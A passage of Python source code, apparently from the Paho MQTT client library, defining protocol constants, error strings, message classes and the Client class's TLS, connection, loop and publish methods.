# define some alias for python2 compatibility
unicode = str
basestring = str
# Message types
CONNECT = 0x10
CONNACK = 0x20
PUBLISH = 0x30
PUBACK = 0x40
PUBREC = 0x50
PUBREL = 0x60
PUBCOMP = 0x70
SUBSCRIBE = 0x80
SUBACK = 0x90
UNSUBSCRIBE = 0xA0
UNSUBACK = 0xB0
PINGREQ = 0xC0
PINGRESP = 0xD0
DISCONNECT = 0xE0
# Log levels
MQTT_LOG_INFO = 0x01
MQTT_LOG_NOTICE = 0x02
MQTT_LOG_WARNING = 0x04
MQTT_LOG_ERR = 0x08
MQTT_LOG_DEBUG = 0x10
LOGGING_LEVEL = {
MQTT_LOG_DEBUG: logging.DEBUG,
MQTT_LOG_INFO: logging.INFO,
MQTT_LOG_NOTICE: logging.INFO, # This has no direct equivalent level
MQTT_LOG_WARNING: logging.WARNING,
MQTT_LOG_ERR: logging.ERROR,
}
# CONNACK codes
CONNACK_ACCEPTED = 0
CONNACK_REFUSED_PROTOCOL_VERSION = 1
CONNACK_REFUSED_IDENTIFIER_REJECTED = 2
CONNACK_REFUSED_SERVER_UNAVAILABLE = 3
CONNACK_REFUSED_BAD_USERNAME_PASSWORD = 4
CONNACK_REFUSED_NOT_AUTHORIZED = 5
# Connection state
mqtt_cs_new = 0
mqtt_cs_connected = 1
mqtt_cs_disconnecting = 2
mqtt_cs_connect_async = 3
# Message state
mqtt_ms_invalid = 0
mqtt_ms_publish = 1
mqtt_ms_wait_for_puback = 2
mqtt_ms_wait_for_pubrec = 3
mqtt_ms_resend_pubrel = 4
mqtt_ms_wait_for_pubrel = 5
mqtt_ms_resend_pubcomp = 6
mqtt_ms_wait_for_pubcomp = 7
mqtt_ms_send_pubrec = 8
mqtt_ms_queued = 9
# Error values
MQTT_ERR_AGAIN = -1
MQTT_ERR_SUCCESS = 0
MQTT_ERR_NOMEM = 1
MQTT_ERR_PROTOCOL = 2
MQTT_ERR_INVAL = 3
MQTT_ERR_NO_CONN = 4
MQTT_ERR_CONN_REFUSED = 5
MQTT_ERR_NOT_FOUND = 6
MQTT_ERR_CONN_LOST = 7
MQTT_ERR_TLS = 8
MQTT_ERR_PAYLOAD_SIZE = 9
MQTT_ERR_NOT_SUPPORTED = 10
MQTT_ERR_AUTH = 11
MQTT_ERR_ACL_DENIED = 12
MQTT_ERR_UNKNOWN = 13
MQTT_ERR_ERRNO = 14
MQTT_ERR_QUEUE_SIZE = 15
MQTT_CLIENT = 0
MQTT_BRIDGE = 1
sockpair_data = b"0"
class WebsocketConnectionError(ValueError):
pass
class WouldBlockError(Exception):
pass
def error_string(mqtt_errno):
"""Return the error string associated with an mqtt error number."""
if mqtt_errno == MQTT_ERR_SUCCESS:
return "No error."
elif mqtt_errno == MQTT_ERR_NOMEM:
return "Out of memory."
elif mqtt_errno == MQTT_ERR_PROTOCOL:
return "A network protocol error occurred when communicating with the broker."
elif mqtt_errno == MQTT_ERR_INVAL:
return "Invalid function arguments provided."
elif mqtt_errno == MQTT_ERR_NO_CONN:
return "The client is not currently connected."
elif mqtt_errno == MQTT_ERR_CONN_REFUSED:
return "The connection was refused."
elif mqtt_errno == MQTT_ERR_NOT_FOUND:
return "Message not found (internal error)."
elif mqtt_errno == MQTT_ERR_CONN_LOST:
return "The connection was lost."
elif mqtt_errno == MQTT_ERR_TLS:
return "A TLS error occurred."
elif mqtt_errno == MQTT_ERR_PAYLOAD_SIZE:
return "Payload too large."
elif mqtt_errno == MQTT_ERR_NOT_SUPPORTED:
return "This feature is not supported."
elif mqtt_errno == MQTT_ERR_AUTH:
return "Authorisation failed."
elif mqtt_errno == MQTT_ERR_ACL_DENIED:
return "Access denied by ACL."
elif mqtt_errno == MQTT_ERR_UNKNOWN:
return "Unknown error."
elif mqtt_errno == MQTT_ERR_ERRNO:
return "Error defined by errno."
else:
return "Unknown error."
def connack_string(connack_code):
"""Return the string associated with a CONNACK result."""
if connack_code == CONNACK_ACCEPTED:
return "Connection Accepted."
elif connack_code == CONNACK_REFUSED_PROTOCOL_VERSION:
return "Connection Refused: unacceptable protocol version."
elif connack_code == CONNACK_REFUSED_IDENTIFIER_REJECTED:
return "Connection Refused: identifier rejected."
elif connack_code == CONNACK_REFUSED_SERVER_UNAVAILABLE:
return "Connection Refused: broker unavailable."
elif connack_code == CONNACK_REFUSED_BAD_USERNAME_PASSWORD:
return "Connection Refused: bad user name or password."
elif connack_code == CONNACK_REFUSED_NOT_AUTHORIZED:
return "Connection Refused: not authorised."
else:
return "Connection Refused: unknown reason."
def base62(num, base=string.digits + string.ascii_letters, padding=1):
"""Convert a number to base-62 representation."""
assert num >= 0
digits = []
while num:
num, rest = divmod(num, 62)
digits.append(base[rest])
digits.extend(base[0] for _ in range(len(digits), padding))
return ''.join(reversed(digits))
def topic_matches_sub(sub, topic):
"""Check whether a topic matches a subscription.
For example:
foo/bar would match the subscription foo/# or +/bar
non/matching would not match the subscription non/+/+
"""
matcher = MQTTMatcher()
matcher[sub] = True
try:
next(matcher.iter_match(topic))
return True
except StopIteration:
return False
def _socketpair_compat():
"""TCP/IP socketpair including Windows support"""
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
listensock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listensock.bind(("127.0.0.1", 0))
listensock.listen(1)
iface, port = listensock.getsockname()
sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_IP)
sock1.setblocking(0)
try:
sock1.connect(("127.0.0.1", port))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
sock2, address = listensock.accept()
sock2.setblocking(0)
listensock.close()
return (sock1, sock2)
class MQTTMessageInfo(object):
"""This is a class returned from Client.publish() and can be used to find
out the mid of the message that was published, and to determine whether the
message has been published, and/or wait until it is published.
"""
__slots__ = 'mid', '_published', '_condition', 'rc', '_iterpos'
def __init__(self, mid):
self.mid = mid
self._published = False
self._condition = threading.Condition()
self.rc = 0
self._iterpos = 0
def __str__(self):
return str((self.rc, self.mid))
def __iter__(self):
self._iterpos = 0
return self
def __next__(self):
return self.next()
def next(self):
if self._iterpos == 0:
self._iterpos = 1
return self.rc
elif self._iterpos == 1:
self._iterpos = 2
return self.mid
else:
raise StopIteration
def __getitem__(self, index):
if index == 0:
return self.rc
elif index == 1:
return self.mid
else:
raise IndexError("index out of range")
def _set_as_published(self):
with self._condition:
self._published = True
self._condition.notify()
def wait_for_publish(self):
"""Block until the message associated with this object is published."""
if self.rc == MQTT_ERR_QUEUE_SIZE:
raise ValueError('Message is not queued due to ERR_QUEUE_SIZE')
with self._condition:
while not self._published:
self._condition.wait()
def is_published(self):
"""Returns True if the message associated with this object has been
published, else returns False."""
if self.rc == MQTT_ERR_QUEUE_SIZE:
raise ValueError('Message is not queued due to ERR_QUEUE_SIZE')
with self._condition:
return self._published
class MQTTMessage(object):
""" This is a class that describes an incoming or outgoing message. It is
passed to the on_message callback as the message parameter.
Members:
topic : String/bytes. topic that the message was published on.
payload : String/bytes the message payload.
qos : Integer. The message Quality of Service 0, 1 or 2.
retain : Boolean. If true, the message is a retained message and not fresh.
mid : Integer. The message id.
On Python 3, topic must be bytes.
"""
__slots__ = 'timestamp', 'state', 'dup', 'mid', '_topic', 'payload', 'qos', 'retain', 'info'
def __init__(self, mid=0, topic=b""):
self.timestamp = 0
self.state = mqtt_ms_invalid
self.dup = False
self.mid = mid
self._topic = topic
self.payload = b""
self.qos = 0
self.retain = False
self.info = MQTTMessageInfo(mid)
def __eq__(self, other):
"""Override the default Equals behavior"""
if isinstance(other, self.__class__):
return self.mid == other.mid
return False
def __ne__(self, other):
"""Define a non-equality test"""
return not self.__eq__(other)
@property
def topic(self):
return self._topic.decode('utf-8')
@topic.setter
def topic(self, value):
self._topic = value
class Client(object):
"""MQTT version 3.1/3.1.1 client class.
This is the main class for use communicating with an MQTT broker.
General usage flow:
* Use connect()/connect_async() to connect to a broker
* Call loop() frequently to maintain network traffic flow with the broker
* Or use loop_start() to set a thread running to call loop() for you.
* Or use loop_forever() to handle calling loop() for you in a blocking
* function.
* Use subscribe() to subscribe to a topic and receive messages
* Use publish() to send messages
* Use disconnect() to disconnect from the broker
Data returned from the broker is made available with the use of callback
functions as described below.
Callbacks
=========
A number of callback functions are available to receive data back from the
broker. To use a callback, define a function and then assign it to the
client:
def on_connect(client, userdata, flags, rc):
print("Connection returned " + str(rc))
client.on_connect = on_connect
All of the callbacks as described below have a "client" and an "userdata"
argument. "client" is the Client instance that is calling the callback.
"userdata" is user data of any type and can be set when creating a new client
instance or with user_data_set(userdata).
The callbacks:
on_connect(client, userdata, flags, rc): called when the broker responds to our connection
request.
flags is a dict that contains response flags from the broker:
flags['session present'] - this flag is useful for clients that are
using clean session set to 0 only. If a client with clean
session=0, that reconnects to a broker that it has previously
connected to, this flag indicates whether the broker still has the
session information for the client. If 1, the session still exists.
The value of rc determines success or not:
0: Connection successful
1: Connection refused - incorrect protocol version
2: Connection refused - invalid client identifier
3: Connection refused - server unavailable
4: Connection refused - bad username or password
5: Connection refused - not authorised
6-255: Currently unused.
on_disconnect(client, userdata, rc): called when the client disconnects from the broker.
The rc parameter indicates the disconnection state. If MQTT_ERR_SUCCESS
(0), the callback was called in response to a disconnect() call. If any
other value the disconnection was unexpected, such as might be caused by
a network error.
on_message(client, userdata, message): called when a message has been received on a
topic that the client subscribes to. The message variable is a
MQTTMessage that describes all of the message parameters.
on_publish(client, userdata, mid): called when a message that was to be sent using the
publish() call has completed transmission to the broker. For messages
with QoS levels 1 and 2, this means that the appropriate handshakes have
completed. For QoS 0, this simply means that the message has left the
client. The mid variable matches the mid variable returned from the
corresponding publish() call, to allow outgoing messages to be tracked.
This callback is important because even if the publish() call returns
success, it does not always mean that the message has been sent.
on_subscribe(client, userdata, mid, granted_qos): called when the broker responds to a
subscribe request. The mid variable matches the mid variable returned
from the corresponding subscribe() call. The granted_qos variable is a
list of integers that give the QoS level the broker has granted for each
of the different subscription requests.
on_unsubscribe(client, userdata, mid): called when the broker responds to an unsubscribe
request. The mid variable matches the mid variable returned from the
corresponding unsubscribe() call.
on_log(client, userdata, level, buf): called when the client has log information. Define
to allow debugging. The level variable gives the severity of the message
and will be one of MQTT_LOG_INFO, MQTT_LOG_NOTICE, MQTT_LOG_WARNING,
MQTT_LOG_ERR, and MQTT_LOG_DEBUG. The message itself is in buf.
on_socket_open(client, userdata, sock): Called when the socket has been opened. Use this
to register the socket with an external event loop for reading.
on_socket_close(client, userdata, sock): Called when the socket is about to be closed.
Use this to unregister a socket from an external event loop for reading.
on_socket_register_write(client, userdata, sock): Called when a write operation to the
socket failed because it would have blocked, e.g. output buffer full. Use this to
register the socket with an external event loop for writing.
on_socket_unregister_write(client, userdata, sock): Called when a write operation to the
socket succeeded after it had previously failed. Use this to unregister the socket
from an external event loop for writing.
"""
def __init__(self, client_id="", clean_session=True, userdata=None,
protocol=MQTTv311, transport="tcp"):
"""client_id is the unique client id string used when connecting to the
broker. If client_id is zero length or None, then the behaviour is
defined by which protocol version is in use. If using MQTT v3.1.1, then
a zero length client id will be sent to the broker and the broker will
generate a random for the client. If using MQTT v3.1 then an id will be
randomly generated. In both cases, clean_session must be True. If this
is not the case a ValueError will be raised.
clean_session is a boolean that determines the client type. If True,
the broker will remove all information about this client when it
disconnects. If False, the client is a persistent client and
subscription information and queued messages will be retained when the
client disconnects.
Note that a client will never discard its own outgoing messages on
disconnect. Calling connect() or reconnect() will cause the messages to
be resent. Use reinitialise() to reset a client to its original state.
userdata is user defined data of any type that is passed as the "userdata"
parameter to callbacks. It may be updated at a later point with the
user_data_set() function.
The protocol argument allows explicit setting of the MQTT version to
use for this client. Can be paho.mqtt.client.MQTTv311 (v3.1.1) or
paho.mqtt.client.MQTTv31 (v3.1), with the default being v3.1.1 If the
broker reports that the client connected with an invalid protocol
version, the client will automatically attempt to reconnect using v3.1
instead.
Set transport to "websockets" to use WebSockets as the transport
mechanism. Set to "tcp" to use raw TCP, which is the default.
"""
if not clean_session and (client_id == "" or client_id is None):
raise ValueError('A client id must be provided if clean session is False.')
if transport.lower() not in ('websockets', 'tcp'):
raise ValueError('transport must be "websockets" or "tcp", not %s' % transport)
self._transport = transport.lower()
self._protocol = protocol
self._userdata = userdata
self._sock = None
self._sockpairR, self._sockpairW = _socketpair_compat()
self._keepalive = 60
self._message_retry = 20
self._last_retry_check = 0
self._clean_session = clean_session
self._client_mode = MQTT_CLIENT
# [MQTT-3.1.3-4] Client Id must be UTF-8 encoded string.
if client_id == "" or client_id is None:
if protocol == MQTTv31:
self._client_id = base62(uuid.uuid4().int, padding=22)
else:
self._client_id = b""
else:
self._client_id = client_id
if isinstance(self._client_id, unicode):
self._client_id = self._client_id.encode('utf-8')
self._username = None
self._password = None
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
self._out_packet = collections.deque()
self._current_out_packet = None
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._reconnect_min_delay = 1
self._reconnect_max_delay = 120
self._reconnect_delay = None
self._ping_t = 0
self._last_mid = 0
self._state = mqtt_cs_new
self._out_messages = collections.OrderedDict()
self._in_messages = collections.OrderedDict()
self._max_inflight_messages = 20
self._inflight_messages = 0
self._max_queued_messages = 0
self._will = False
self._will_topic = b""
self._will_payload = b""
self._will_qos = 0
self._will_retain = False
self._on_message_filtered = MQTTMatcher()
self._host = ""
self._port = 1883
self._bind_address = ""
self._in_callback_mutex = threading.Lock()
self._callback_mutex = threading.RLock()
self._out_packet_mutex = threading.Lock()
self._current_out_packet_mutex = threading.RLock()
self._msgtime_mutex = threading.Lock()
self._out_message_mutex = threading.RLock()
self._in_message_mutex = threading.Lock()
self._reconnect_delay_mutex = threading.Lock()
self._mid_generate_mutex = threading.Lock()
self._thread = None
self._thread_terminate = False
self._ssl = False
self._ssl_context = None
self._tls_insecure = False # Only used when SSL context does not have check_hostname attribute
self._logger = None
self._registered_write = False
# No default callbacks
self._on_log = None
self._on_connect = None
self._on_subscribe = None
self._on_message = None
self._on_publish = None
self._on_unsubscribe = None
self._on_disconnect = None
self._on_socket_open = None
self._on_socket_close = None
self._on_socket_register_write = None
self._on_socket_unregister_write = None
self._websocket_path = "/mqtt"
self._websocket_extra_headers = None
def __del__(self):
self._reset_sockets()
def _sock_recv(self, bufsize):
try:
return self._sock.recv(bufsize)
except socket.error as err:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
raise WouldBlockError()
raise
def _sock_send(self, buf):
try:
return self._sock.send(buf)
except socket.error as err:
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_READ:
raise WouldBlockError()
if self._ssl and err.errno == ssl.SSL_ERROR_WANT_WRITE:
self._call_socket_register_write()
raise WouldBlockError()
if err.errno == EAGAIN:
self._call_socket_register_write()
raise WouldBlockError()
raise
def _sock_close(self):
"""Close the connection to the server."""
if not self._sock:
return
try:
sock = self._sock
self._sock = None
self._call_socket_unregister_write(sock)
self._call_socket_close(sock)
finally:
# In case a callback fails, still close the socket to avoid leaking the file descriptor.
sock.close()
def _reset_sockets(self):
self._sock_close()
if self._sockpairR:
self._sockpairR.close()
self._sockpairR = None
if self._sockpairW:
self._sockpairW.close()
self._sockpairW = None
def reinitialise(self, client_id="", clean_session=True, userdata=None):
self._reset_sockets()
self.__init__(client_id, clean_session, userdata)
def ws_set_options(self, path="/mqtt", headers=None):
""" Set the path and headers for a websocket connection
path is a string starting with / which should be the endpoint of the
mqtt connection on the remote server
headers can be either a dict or a callable object. If it is a dict then
the extra items in the dict are added to the websocket headers. If it is
a callable, then the default websocket headers are passed into this
function and the result is used as the new headers.
"""
self._websocket_path = path
if headers is not None:
if isinstance(headers, dict) or callable(headers):
self._websocket_extra_headers = headers
else:
raise ValueError("'headers' option to ws_set_options has to be either a dictionary or callable")
def tls_set_context(self, context=None):
"""Configure network encryption and authentication context. Enables SSL/TLS support.
context : an ssl.SSLContext object. By default this is given by
`ssl.create_default_context()`, if available.
Must be called before connect() or connect_async()."""
if self._ssl_context is not None:
raise ValueError('SSL/TLS has already been configured.')
# Assume that have SSL support, or at least that context input behaves like ssl.SSLContext
# in current versions of Python
if context is None:
if hasattr(ssl, 'create_default_context'):
context = ssl.create_default_context()
else:
raise ValueError('SSL/TLS context must be specified')
self._ssl = True
self._ssl_context = context
# Ensure _tls_insecure is consistent with check_hostname attribute
if hasattr(context, 'check_hostname'):
self._tls_insecure = not context.check_hostname
def tls_set(self, ca_certs=None, certfile=None, keyfile=None, cert_reqs=None, tls_version=None, ciphers=None):
"""Configure network encryption and authentication options. Enables SSL/TLS support.
ca_certs : a string path to the Certificate Authority certificate files
that are to be treated as trusted by this client. If this is the only
option given then the client will operate in a similar manner to a web
browser. That is to say it will require the broker to have a
certificate signed by the Certificate Authorities in ca_certs and will
communicate using TLS v1, but will not attempt any form of
authentication. This provides basic network encryption but may not be
sufficient depending on how the broker is configured.
By default, on Python 2.7.9+ or 3.4+, the default certification
authority of the system is used. On older Python version this parameter
is mandatory.
certfile and keyfile are strings pointing to the PEM encoded client
certificate and private keys respectively. If these arguments are not
None then they will be used as client information for TLS based
authentication. Support for this feature is broker dependent. Note
that if either of these files in encrypted and needs a password to
decrypt it, Python will ask for the password at the command line. It is
not currently possible to define a callback to provide the password.
cert_reqs allows the certificate requirements that the client imposes
on the broker to be changed. By default this is ssl.CERT_REQUIRED,
which means that the broker must provide a certificate. See the ssl
pydoc for more information on this parameter.
tls_version allows the version of the SSL/TLS protocol used to be
specified. By default TLS v1 is used. Previous versions (all versions
beginning with SSL) are possible but not recommended due to possible
security problems.
ciphers is a string specifying which encryption ciphers are allowable
for this connection, or None to use the defaults. See the ssl pydoc for
more information.
Must be called before connect() or connect_async()."""
if ssl is None:
raise ValueError('This platform has no SSL/TLS.')
if not hasattr(ssl, 'SSLContext'):
# Require Python version that has SSL context support in standard library
raise ValueError('Python 2.7.9 and 3.2 are the minimum supported versions for TLS.')
if ca_certs is None and not hasattr(ssl.SSLContext, 'load_default_certs'):
raise ValueError('ca_certs must not be None.')
# Create SSLContext object
if tls_version is None:
tls_version = ssl.PROTOCOL_TLSv1
# If the python version supports it, use highest TLS version automatically
if hasattr(ssl, "PROTOCOL_TLS"):
tls_version = ssl.PROTOCOL_TLS
context = ssl.SSLContext(tls_version)
# Configure context
if certfile is not None:
context.load_cert_chain(certfile, keyfile)
if cert_reqs == ssl.CERT_NONE and hasattr(context, 'check_hostname'):
context.check_hostname = False
context.verify_mode = ssl.CERT_REQUIRED if cert_reqs is None else cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
else:
context.load_default_certs()
if ciphers is not None:
context.set_ciphers(ciphers)
self.tls_set_context(context)
if cert_reqs != ssl.CERT_NONE:
# Default to secure, sets context.check_hostname attribute
# if available
self.tls_insecure_set(False)
else:
# But with ssl.CERT_NONE, we can not check_hostname
self.tls_insecure_set(True)
def tls_insecure_set(self, value):
"""Configure verification of the server hostname in the server certificate.
If value is set to true, it is impossible to guarantee that the host
you are connecting to is not impersonating your server. This can be
useful in initial server testing, but makes it possible for a malicious
third party to impersonate your server through DNS spoofing, for
example.
Do not use this function in a real system. Setting value to true means
there is no point using encryption.
Must be called before connect() and after either tls_set() or
tls_set_context()."""
if self._ssl_context is None:
raise ValueError('Must configure SSL context before using tls_insecure_set.')
self._tls_insecure = value
# Ensure check_hostname is consistent with _tls_insecure attribute
if hasattr(self._ssl_context, 'check_hostname'):
# Rely on SSLContext to check host name
# If verify_mode is CERT_NONE then the host name will never be checked
self._ssl_context.check_hostname = not value
def enable_logger(self, logger=None):
""" Enables a logger to send log messages to """
if logger is None:
if self._logger is not None:
# Do not replace existing logger
return
logger = logging.getLogger(__name__)
self._logger = logger
def disable_logger(self):
self._logger = None
def connect(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
self.connect_async(host, port, keepalive, bind_address)
return self.reconnect()
def connect_srv(self, domain=None, keepalive=60, bind_address=""):
"""Connect to a remote broker.
domain is the DNS domain to search for SRV records; if None,
try to determine local domain name.
keepalive and bind_address are as for connect()
"""
if HAVE_DNS is False:
raise ValueError('No DNS resolver library found, try "pip install dnspython" or "pip3 install dnspython3".')
if domain is None:
domain = socket.getfqdn()
domain = domain[domain.find('.') + 1:]
try:
rr = '_mqtt._tcp.%s' % domain
if self._ssl:
# IANA specifies secure-mqtt (not mqtts) for port 8883
rr = '_secure-mqtt._tcp.%s' % domain
answers = []
for answer in dns.resolver.query(rr, dns.rdatatype.SRV):
addr = answer.target.to_text()[:-1]
answers.append((addr, answer.port, answer.priority, answer.weight))
except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer, dns.resolver.NoNameservers):
raise ValueError("No answer/NXDOMAIN for SRV in %s" % (domain))
# FIXME: doesn't account for weight
for answer in answers:
host, port, prio, weight = answer
try:
return self.connect(host, port, keepalive, bind_address)
except:
pass
raise ValueError("No SRV hosts responded")
def connect_async(self, host, port=1883, keepalive=60, bind_address=""):
"""Connect to a remote broker asynchronously. This is a non-blocking
connect call that can be used with loop_start() to provide very quick
start.
host is the hostname or IP address of the remote broker.
port is the network port of the server host to connect to. Defaults to
1883. Note that the default port for MQTT over SSL/TLS is 8883 so if you
are using tls_set() the port may need providing.
keepalive: Maximum period in seconds between communications with the
broker. If no other messages are being exchanged, this controls the
rate at which the client will send ping messages to the broker.
"""
if host is None or len(host) == 0:
raise ValueError('Invalid host.')
if port <= 0:
raise ValueError('Invalid port number.')
if keepalive < 0:
raise ValueError('Keepalive must be >=0.')
if bind_address != "" and bind_address is not None:
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 2):
raise ValueError('bind_address requires Python 2.7 or 3.2.')
self._host = host
self._port = port
self._keepalive = keepalive
self._bind_address = bind_address
self._state = mqtt_cs_connect_async
def reconnect_delay_set(self, min_delay=1, max_delay=120):
""" Configure the exponential reconnect delay
When connection is lost, wait initially min_delay seconds and
double this time every attempt. The wait is capped at max_delay.
Once the client is fully connected (e.g. not only TCP socket, but
received a success CONNACK), the wait timer is reset to min_delay.
"""
with self._reconnect_delay_mutex:
self._reconnect_min_delay = min_delay
self._reconnect_max_delay = max_delay
self._reconnect_delay = None
def reconnect(self):
"""Reconnect the client after a disconnect. Can only be called after
connect()/connect_async()."""
if len(self._host) == 0:
raise ValueError('Invalid host.')
if self._port <= 0:
raise ValueError('Invalid port number.')
self._in_packet = {
"command": 0,
"have_remaining": 0,
"remaining_count": [],
"remaining_mult": 1,
"remaining_length": 0,
"packet": b"",
"to_process": 0,
"pos": 0}
with self._out_packet_mutex:
self._out_packet = collections.deque()
with self._current_out_packet_mutex:
self._current_out_packet = None
with self._msgtime_mutex:
self._last_msg_in = time_func()
self._last_msg_out = time_func()
self._ping_t = 0
self._state = mqtt_cs_new
self._sock_close()
# Put messages in progress in a valid state.
self._messages_reconnect_reset()
try:
if sys.version_info < (2, 7) or (3, 0) < sys.version_info < (3, 2):
sock = socket.create_connection((self._host, self._port))
else:
sock = socket.create_connection((self._host, self._port), source_address=(self._bind_address, 0))
except socket.error as err:
if err.errno != errno.EINPROGRESS and err.errno != errno.EWOULDBLOCK and err.errno != EAGAIN:
raise
if self._ssl:
# SSL is only supported when SSLContext is available (implies Python >= 2.7.9 or >= 3.2)
verify_host = not self._tls_insecure
try:
# Try with server_hostname, even it's not supported in certain scenarios
sock = self._ssl_context.wrap_socket(
sock,
server_hostname=self._host,
do_handshake_on_connect=False,
)
except ssl.CertificateError:
# CertificateError is derived from ValueError
raise
except ValueError:
# Python version requires SNI in order to handle server_hostname, but SNI is not available
sock = self._ssl_context.wrap_socket(
sock,
do_handshake_on_connect=False,
)
else:
# If SSL context has already checked hostname, then don't need to do it again
if (hasattr(self._ssl_context, 'check_hostname') and
self._ssl_context.check_hostname):
verify_host = False
sock.settimeout(self._keepalive)
sock.do_handshake()
if verify_host:
ssl.match_hostname(sock.getpeercert(), self._host)
if self._transport == "websockets":
sock.settimeout(self._keepalive)
sock = WebsocketWrapper(sock, self._host, self._port, self._ssl,
self._websocket_path, self._websocket_extra_headers)
self._sock = sock
self._sock.setblocking(0)
self._registered_write = False
self._call_socket_open()
return self._send_connect(self._keepalive, self._clean_session)
def loop(self, timeout=1.0, max_packets=1):
"""Process network events.
This function must be called regularly to ensure communication with the
broker is carried out. It calls select() on the network socket to wait
for network events. If incoming data is present it will then be
processed. Outgoing commands, from e.g. publish(), are normally sent
immediately that their function is called, but this is not always
possible. loop() will also attempt to send any remaining outgoing
messages, which also includes commands that are part of the flow for
messages with QoS>0.
timeout: The time in seconds to wait for incoming/outgoing network
traffic before timing out and returning.
max_packets: Not currently used.
Returns MQTT_ERR_SUCCESS on success.
Returns >0 on error.
A ValueError will be raised if timeout < 0"""
if timeout < 0.0:
raise ValueError('Invalid timeout.')
with self._current_out_packet_mutex:
with self._out_packet_mutex:
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.popleft()
if self._current_out_packet:
wlist = [self._sock]
else:
wlist = []
# used to check if there are any bytes left in the (SSL) socket
pending_bytes = 0
if hasattr(self._sock, 'pending'):
pending_bytes = self._sock.pending()
# if bytes are pending do not wait in select
if pending_bytes > 0:
timeout = 0.0
# sockpairR is used to break out of select() before the timeout, on a
# call to publish() etc.
rlist = [self._sock, self._sockpairR]
try:
socklist = select.select(rlist, wlist, [], timeout)
except TypeError:
# Socket isn't correct type, in likelihood connection is lost
return MQTT_ERR_CONN_LOST
except ValueError:
# Can occur if we just reconnected but rlist/wlist contain a -1 for
# some reason.
return MQTT_ERR_CONN_LOST
except KeyboardInterrupt:
# Allow ^C to interrupt
raise
except:
return MQTT_ERR_UNKNOWN
if self._sock in socklist[0] or pending_bytes > 0:
rc = self.loop_read(max_packets)
if rc or self._sock is None:
return rc
if self._sockpairR in socklist[0]:
# Stimulate output write even though we didn't ask for it, because
# at that point the publish or other command wasn't present.
socklist[1].insert(0, self._sock)
# Clear sockpairR - only ever a single byte written.
try:
self._sockpairR.recv(1)
except socket.error as err:
if err.errno != EAGAIN:
raise
if self._sock in socklist[1]:
rc = self.loop_write(max_packets)
if rc or self._sock is None:
return rc
return self.loop_misc()
def publish(self, topic, payload=None, qos=0, retain=False):
"""Publish a message on a topic.
This causes a message to be sent to the broker and subsequently from
the broker to any clients subscribing to matching topics.
topic: The topic that the message should be published on.
payload: The actual message to send. If not given, or set to None a
zero length message will be used. Passing an int or float will result
in the payload being converted to a string representing that number. If
you wish to send a true int/float, use struct.pack() to create the
payload you require.
qos: The quality of service level to use.
retain: If set to true, the message will be set as the "last known
good"/retained message for the topic.
Returns a MQTTMessageInfo class, which can be used to determine whether
the message has been delivered (using info.is_published()) or to block
waiting for the message to be delivered (info.wait_for_publish()). The
message ID and return code of the publish() call can be found at
info.mid and info.rc.
For backwards compatibility, the MQTTMessageInfo class is iterable so
the old construct of (rc, mid) = client.publish(...) is still valid.
rc is MQTT_ERR_SUCCESS to indicate success or MQTT_ERR_NO_CONN if the
client is not currently connected. mid is the message ID for the
publish request. The mid value can be used to track the publish request
by checking against the mid argument in the on_publish() callback if it
is defined.
A ValueError will be raised if topic is None, has zero length or is
invalid (contains a wildcard), if qos is not one of 0, 1 or 2, or if
the length of the payload is greater than 268435455 bytes."""
if topic is None or len(topic) == 0:
raise ValueError('Invalid topic.')
topic = topic.encode('utf-8')
if self._topic_wildcard_len_check(topic) != MQTT_ERR_SUCCESS:
raise ValueError('Publish topic cannot contain wildcards.')
if qos < 0 or qos > 2:
raise ValueError('Invalid QoS level.')
if isinstance(payload, unicode):
local_payload = payload.encode('utf-8')
elif isinstance(payload, (bytes, bytearray)):
local_payload = payload
elif isinstance(payload, (int, float)):
local_payload = str(payload).encode('ascii')
elif payload is None:
local_payload = b''
else:
raise TypeError('payload must be a string, bytearray, int, float or None.')
if len(local_payload) > 268435455:
raise ValueError('Payload too large.')
local_mid = self._mid_generate()
if qos == 0:
info = MQTTMessageInfo(local_mid)
rc = self._send_publish(local_mid, topic, local_payload, qos, retain, False, info)
info.rc = rc
return info
else:
message = MQTTMessage(local_mid, topic)
message.timestamp = time_func()
message.payload = local_payload
message.qos = qos
message.retain = retain
message.dup = False
with self._out_message_mutex:
if self._max_queued_messages > 0 and len(self._out_messages) >= self._max_queued_messages:
message.info.rc = MQTT_ERR_QUEUE_SIZE
return message.info
if local_mid in self._out_messages:
message.info.rc = MQTT_ERR_QUEUE_SIZE
return message.info
self._out_messages[message.mid] = message
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
self._inflight_messages += 1
if qos == 1:
message.state = mqtt_ms_wait_for_puback
elif qos == 2:
message.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(message.mid, topic, message.payload, message.qos, message.retain,
message.dup)
# remove from inflight messages so it will be send after a connection is made
if rc is MQTT_ERR_NO_CONN:
self._inflight_messages -= 1
message.state = mqtt_ms_publish
message.info.rc = rc
return message.info
else:
message.state = mqtt_ms_queued
message.info.rc = MQTT_ERR_SUCCESS
return message.info
def username_pw_set(self, username, password=None):
"""Set a username and optionally a password for broker authentication.
Must be called before connect() to have any effect.
